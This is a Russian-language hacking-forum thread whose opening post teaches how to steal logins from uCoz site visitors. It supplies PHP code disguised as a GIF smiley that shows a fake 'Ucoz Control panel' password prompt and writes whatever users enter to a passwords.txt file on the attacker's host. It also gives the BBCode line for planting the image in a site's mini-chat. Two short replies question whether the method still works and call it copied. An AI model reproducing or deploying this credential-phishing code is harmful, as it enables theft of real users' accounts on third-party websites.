Регистрация Главная Сообщество
Сообщения за день Справка Регистрация

Взлом ucoz сайтов

-

Халява для Читера

- Бесплатные раздачи аккаунтов, инвайтов и прочего. Публикуется только собственная информация авторов - если кто-то разместил Ваши данные, требуйте их удаления.

Ответ
 
Опции темы
Старый 05.09.2013, 01:40   #1
 Разведчик
Аватар для sergeygrigoriev
 
sergeygrigoriev вызывает надежду
Регистрация: 29.04.2011
Сообщений: 1
Популярность: -33
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Взлом ucoz сайтов

Привет. Сегодня я расскажу один из способов взлома сайтов на юкозе. Настоящий хакер может найти достаточно много уязвимостей на таких сайтах и знает много способов их взлома. Я надеюсь что скоро тоже буду таким=).

Итак, начнем...
Для начала нажно зарегистировать хост с поддержкой php (например [Ссылки могут видеть только зарегистрированные пользователи. ]) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif).
Затем откройте блокнот, да простой блокнот и напишите следующее:

Код:
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
  Header('HTTP/1.1 401 Unauthorized');
  Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>
Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif.
Теперь выбирайте любой юкозовский сайт, например [Ссылки могут видеть только зарегистрированные пользователи. ] слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:

Код:
[img]http:mysite.phphost.net/smile.gif[/img]
И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это [Ссылки могут видеть только зарегистрированные пользователи. ]) будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп.
  Ответить с цитированием
Старый 05.09.2013, 04:19   #2
 Разведчик
Аватар для bulletdaniel
 
bulletdaniel скоро будет известенbulletdaniel скоро будет известенbulletdaniel скоро будет известен
Регистрация: 16.12.2011
Сообщений: 27
Популярность: 229
Сказал(а) спасибо: 123
Поблагодарили 52 раз(а) в 32 сообщениях
 
По умолчанию Re: Взлом ucoz сайтов

что работает?)
  Ответить с цитированием
Старый 05.09.2013, 05:37   #3
 Разведчик
Аватар для @вовака@
 
@вовака@ скоро будет известен@вовака@ скоро будет известен@вовака@ скоро будет известен
Регистрация: 13.07.2013
Сообщений: 5
Популярность: 276
Сказал(а) спасибо: 0
Поблагодарили 40 раз(а) в 27 сообщениях
Отправить сообщение для @вовака@ с помощью Skype™
 
По умолчанию Re: Взлом ucoz сайтов

старый способ
да и копиаст это. Ссылку на источник сделай
  Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Шаблон для сайтов uCoz 44game Общение и обсуждение Perfect World 18 15.01.2011 03:47

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 21:31.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net